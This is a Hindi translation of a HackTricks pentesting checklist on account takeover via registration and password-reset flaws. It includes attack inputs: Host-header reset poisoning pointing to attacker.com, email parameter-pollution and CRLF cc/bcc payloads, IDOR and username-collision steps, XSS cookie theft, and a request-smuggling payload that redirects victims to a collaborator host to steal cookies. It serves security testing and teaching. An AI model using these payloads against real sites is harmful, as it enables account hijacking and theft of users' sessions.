16 KiB
पंजीकरण और अधिग्रहण संवेदनशीलताएँ
AWS हैकिंग सीखें शून्य से नायक तक htARTE (HackTricks AWS Red Team Expert) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो सदस्यता योजनाएँ देखें!
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- The PEASS Family की खोज करें, हमारा विशेष NFTs संग्रह
- 💬 Discord समूह में शामिल हों या telegram समूह या Twitter पर मुझे 🐦 @carlospolopm का अनुसरण करें.
- अपनी हैकिंग तरकीबें साझा करें, HackTricks और HackTricks Cloud github repos में PRs सबमिट करके.
पंजीकरण अधिग्रहण
डुप्लिकेट पंजीकरण
- मौजूदा उपयोगकर्ता नाम का उपयोग करके उत्पन्न करने का प्रयास करें
- ईमेल में विविधता जांचें:
- अपरकेस
- +1@
- ईमेल में कुछ जोड़ें
- ईमेल नाम में विशेष अक्षर (%00, %09, %20)
- ईमेल के बाद काले अक्षर डालें:
test@test.com a
- victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com
उपयोगकर्ता नाम सूचीकरण
जांचें कि क्या आप पता लगा सकते हैं जब एक उपयोगकर्ता नाम पहले से ही एप्लिकेशन के अंदर पंजीकृत हो चुका है।
पासवर्ड नीति
एक उपयोगकर्ता बनाते समय पासवर्ड नीति की जांच करें (जांचें कि क्या आप कमजोर पासवर्ड का उपयोग कर सकते हैं).
उस स्थिति में आप प्रमाणीकरण को ब्रूटफोर्स करने का प्रयास कर सकते हैं।
SQL इंजेक्शन
इस पृष्ठ की जांच करें पंजीकरण फॉर्म में SQL इंजेक्शन के माध्यम से खाता अधिग्रहण या जानकारी निकालने का प्रयास करने के लिए।
Oauth अधिग्रहण
{% content-ref url="oauth-to-account-takeover.md" %} oauth-to-account-takeover.md {% endcontent-ref %}
SAML संवेदनशीलताएँ
{% content-ref url="saml-attacks/" %} saml-attacks {% endcontent-ref %}
ईमेल बदलें
पंजीकृत होने पर ईमेल बदलने का प्रयास करें और जांचें कि क्या यह परिवर्तन सही ढंग से मान्य है या आप इसे मनमाने ईमेल में बदल सकते हैं।
अधिक जांच
- जांचें कि क्या आप डिस्पोजेबल ईमेल का उपयोग कर सकते हैं
- लंबा पासवर्ड (>200) DoS का कारण बनता है
- खाता निर्माण पर दर सीमा की जांच करें
- username@burp_collab.net का उपयोग करें और कॉलबैक का विश्लेषण करें
पासवर्ड रीसेट अधिग्रहण
पासवर्ड रीसेट टोकन रेफरर के माध्यम से लीक
- अपने ईमेल पते पर पासवर्ड रीसेट का अनुरोध करें
- पासवर्ड रीसेट लिंक पर क्लिक करें
- पासवर्ड बदलें नहीं
- किसी भी तृतीय पक्ष वेबसाइटों पर क्लिक करें (उदाहरण: Facebook, twitter)
- Burp Suite प्रॉक्सी में अनुरोध को इंटरसेप्ट करें
- जांचें कि क्या रेफरर हेडर पासवर्ड रीसेट टोकन लीक कर रहा है।
पासवर्ड रीसेट जहरीलापन
- Burp Suite में पासवर्ड रीसेट अनुरोध को इंटरसेप्ट करें
- Burp Suite में निम्नलिखित हेडर्स को जोड़ें या संपादित करें:
Host: attacker.com
,X-Forwarded-Host: attacker.com
- संशोधित हेडर के साथ अनुरोध को आगे बढ़ाएं
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
- host header के आधार पर पासवर्ड रीसेट URL की तलाश करें जैसे:
https://attacker.com/reset-password.php?token=TOKEN
ईमेल पैरामीटर के माध्यम से पासवर्ड रीसेट
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
API पैरामीटर्स पर IDOR
- हमलावर को अपने खाते से लॉगिन करना होगा और पासवर्ड बदलें सुविधा पर जाना होगा।
- Burp Suite शुरू करें और अनुरोध को इंटरसेप्ट करें।
- इसे रिपीटर टैब पर भेजें और पैरामीटर्स को संपादित करें: उपयोगकर्ता ID/ईमेल
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
कमजोर पासवर्ड रीसेट टोकन
पासवर्ड रीसेट टोकन को यादृच्छिक रूप से उत्पन्न किया जाना चाहिए और हर बार अद्वितीय होना चाहिए।
यह निर्धारित करने का प्रयास करें कि टोकन समाप्त होता है या यह हमेशा समान रहता है, कुछ मामलों में उत्पादन एल्गोरिदम कमजोर होता है और अनुमान लगाया जा सकता है। निम्नलिखित चर एल्गोरिदम द्वारा उपयोग किए जा सकते हैं।
- Timestamp
- UserID
- उपयोगकर्ता का ईमेल
- प्रथम नाम और उपनाम
- जन्म तिथि
- Cryptography
- केवल संख्या
- छोटा टोकन अनुक्रम (वर्ण [A-Z,a-z,0-9] के बीच)
- टोकन पुन: उपयोग
- टोकन समाप्ति तिथि
पासवर्ड रीसेट टोकन का लीक होना
- एक विशिष्ट ईमेल के लिए API/UI का उपयोग करके पासवर्ड रीसेट अनुरोध ट्रिगर करें, उदाहरण: test@mail.com
- सर्वर प्रतिक्रिया की जांच करें और
resetToken
के लिए देखें। - फिर टोकन को एक URL में उपयोग करें जैसे
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
उपयोगकर्ता नाम संघर्ष के माध्यम से पासवर्ड रीसेट
- पीड़ित के उपयोगकर्ता नाम के समान एक उपयोगकर्ता नाम के साथ सिस्टम पर रजिस्टर करें, लेकिन उपयोगकर्ता नाम से पहले और/या बाद में सफेद स्थान डालें। उदाहरण:
"admin "
- अपने दुर्भावनापूर्ण उपयोगकर्ता नाम के साथ पासवर्ड रीसेट का अनुरोध करें।
- अपने ईमेल पर भेजे गए टोकन का उपयोग करें और पीड़ित का पासवर्ड रीसेट करें।
- नए पासवर्ड के साथ पीड़ित खाते में कनेक्ट करें।
CTFd प्लेटफॉर्म इस हमले के लिए संवेदनशील था।
देखें: CVE-2020-7245
क्रॉस साइट स्क्रिप्टिंग के माध्यम से खाता अधिग्रहण
- एप्लिकेशन के अंदर या एक सबडोमेन में XSS खोजें अगर कुकीज़ मूल डोमेन के लिए स्कोप की गई हैं:
*.domain.com
- वर्तमान सत्र कुकी का लीक करें।
- कुकी का उपयोग करके उपयोगकर्ता के रूप में प्रमाणित करें।
HTTP अनुरोध स्मगलिंग के माध्यम से खाता अधिग्रहण
1. smuggler का उपयोग करके HTTP अनुरोध स्मगलिंग के प्रकार का पता लगाएं (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. एक अनुरोध तैयार करें जो POST / HTTP/1.1
को निम्नलिखित डेटा के साथ ओवरराइट करेगा:
GET http://something.burpcollaborator.net HTTP/1.1 X:
लक्ष्य के साथ पीड़ितों को burpcollab पर रीडायरेक्ट करने और उनके कुकीज़ चुराने के लिए
3. अंतिम अनुरोध निम्नलिखित की तरह दिख सकता है
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
Hackerone रिपोर्ट्स इस बग का शोषण करती हैं:
CSRF के माध्यम से खाता अपहरण
- CSRF के लिए पेलोड बनाएं, उदाहरण: “पासवर्ड बदलने के लिए स्वत: सबमिट होने वाला HTML फॉर्म”
- पेलोड भेजें
JWT के माध्यम से खाता अपहरण
JSON Web Token का उपयोग एक उपयोगकर्ता को प्रमाणित करने के लिए किया जा सकता है।
- दूसरे उपयोगकर्ता ID / ईमेल के साथ JWT संपादित करें
- कमजोर JWT हस्ताक्षर की जांच करें
{% content-ref url="hacking-jwt-json-web-tokens.md" %} hacking-jwt-json-web-tokens.md {% endcontent-ref %}
संदर्भ
htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें तो सब्सक्रिप्शन प्लान्स देखें!
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- The PEASS Family की खोज करें, हमारा एक्सक्लूसिव NFTs का संग्रह
- 💬 Discord group में शामिल हों या telegram group या Twitter 🐦 पर मुझे फॉलो करें @carlospolopm.
- HackTricks के github repos और HackTricks Cloud में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।